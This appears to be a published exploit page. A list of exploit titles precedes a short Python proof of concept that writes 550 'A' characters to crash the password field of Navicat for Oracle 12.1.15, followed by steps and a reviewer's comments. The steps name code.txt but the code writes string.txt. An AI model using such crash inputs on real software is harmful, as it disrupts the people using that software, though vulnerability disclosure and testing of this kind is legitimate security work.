
9 changes to exploits/shellcodes

ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)
ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)
AirMore 1.6.1 - Denial of Service (PoC)
Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)
Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)
VSCO 1.1.1.0 - Denial of Service (PoC)
Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference
Webiness Inventory 2.3 - SQL Injection
Webiness Inventory 2.3 - 'order' SQL Injection
MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery
Jinja2 2.10 - 'from_string' Server Side Template Injection
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
29 lines
No EOL
969 B
Python
Executable file
#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-14
#Vendor Homepage: https://www.navicat.com/es/
#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
#Tested Version: 12.1.15
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Navicat_for_Oracle_12.1.15.py
#2.- Open code.txt and copy content to clipboard
#2.- Open Navicat for Oracle 12.1.15
#3.- Select "Conexión"
#4.- Select "Oracle"
#5.- In "Nombre de conexión" type "Test"
#6.- In "Tipo de conexión" select "Basic"
#7.- In "Host" type 1.1.1.1
#8.- In "Puerto" type "1521"
#9.- In "Nombre del servicio" type ORCL
#10.- In "Nombre de usuario" type "user"
#11.- In "Contraseña" Paste Clipboard
#12.- Select "Aceptar"
#13.- Crashed
cod = "\x41" * 550
f = open('string.txt', 'w')
f.write(cod)
f.close()
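
Review bot: the header steps and the code disagree on the output file name: the second step says to open code.txt, while the open() call writes string.txt, so the two names should be made to match. The step label "2.-" is also used twice, which leaves every later step number off by one against the 14 actions listed. The header records the tested version and platforms but no fixed version or vendor reference, so a reader cannot tell from this file which releases remain affected; a line for that would help triage. The open()/write()/close() sequence would be tidier as a with block so the handle is closed even if the write fails.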